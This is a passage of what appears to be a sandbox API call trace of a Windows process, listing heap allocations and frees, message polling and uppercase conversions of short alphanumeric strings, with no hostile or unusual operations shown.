0x2aa9c10 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0090.892] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0090.892] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.893] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0090.893] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0090.893] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.893] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.893] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0090.894] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0090.894] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0090.894] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0090.895] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74118 [0090.895] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0090.895] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0090.895] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0090.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74118 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.896] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0090.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0090.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0090.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0090.897] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.897] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0090.897] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0090.897] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.898] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0090.898] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.898] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0090.898] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0090.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0090.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 